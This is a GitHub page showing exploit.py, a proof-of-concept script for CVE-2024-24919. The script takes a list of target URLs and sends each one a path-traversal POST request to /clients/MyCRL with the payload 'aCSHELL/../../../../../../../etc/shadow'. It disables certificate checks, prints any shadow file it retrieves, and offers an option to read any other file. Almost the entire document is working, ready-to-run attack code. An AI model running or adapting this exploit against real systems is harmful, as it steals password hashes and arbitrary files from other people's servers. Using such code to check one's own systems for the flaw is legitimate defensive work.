forked from seed1337/CVE-2024-24919-POC
-
Notifications
You must be signed in to change notification settings - Fork 0
/
exploit.py
85 lines (73 loc) · 4.63 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
import argparse
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
# Suppress SSL warnings
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
vuln = ['root:', 'nobody:']
def make_request(url, payload=None, headers=None):
try:
response = requests.post(url, data=payload, headers=headers, verify=False)
if response.ok:
for word in vuln:
if word in response.text:
print(f"[+] {url} is vulnerable")
if payload and payload.startswith("aCSHELL/../../../../../../../etc/shadow"):
print("╔══════════════════════════════════════════════════════╗")
print("║ etc/shadow found: ║")
print("╚══════════════════════════════════════════════════════╝")
print("╔══════════════════════════════════════════════════════╗")
print(f" {response.text} ")
print("╚══════════════════════════════════════════════════════╝")
elif payload:
print("╔══════════════════════════════════════════════════════╗")
print("║ Your file was found: ║")
print("╚══════════════════════════════════════════════════════╝")
print("╔══════════════════════════════════════════════════════╗")
print(f" {response.text} ")
print("╚══════════════════════════════════════════════════════╝")
return
print(f"[-] {url} is not vulnerable")
else:
print(f"[-] {url} responded with status code: {response.status_code}")
except requests.RequestException as e:
print(f"Error making request to {url}: {e}")
def main():
payload = "aCSHELL/../../../../../../../etc/shadow"
parser = argparse.ArgumentParser(description="CVE-2024-24919 POC - erg0sum")
parser.add_argument("-l", metavar='filename', type=str, help="File containing list of HTTP/HTTPS targets")
parser.add_argument("-f", metavar='file', type=str, help="File to read for custom payload (May break on multiple targets with unknown files.)")
args = parser.parse_args()
headers = {
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate, br",
"Upgrade-Insecure-Requests": "1",
"Sec-Fetch-Dest": "document",
"Sec-Fetch-Mode": "navigate",
"Sec-Fetch-Site": "none",
"Sec-Fetch-User": "?1",
"Dnt": "1",
"Sec-Gpc": "1",
"Te": "trailers",
"Connection": "close"
}
payload_base = "aCSHELL/../../../../../../../{}"
if args.f:
payload = payload_base.format(args.f)
if args.l:
try:
with open(args.l, 'r') as file:
urls = file.readlines()
for url in urls:
url = url.strip()
if url.startswith('http://') or url.startswith('https://'):
make_request(url + '/clients/MyCRL', payload=payload, headers=headers)
else:
print(f"Skipping invalid URL: {url}")
except FileNotFoundError:
print(f"Error: File '{args.l}' not found.")
else:
print("Please provide a file containing list of HTTP/HTTPS targets using -l option.")
if __name__ == "__main__":
main()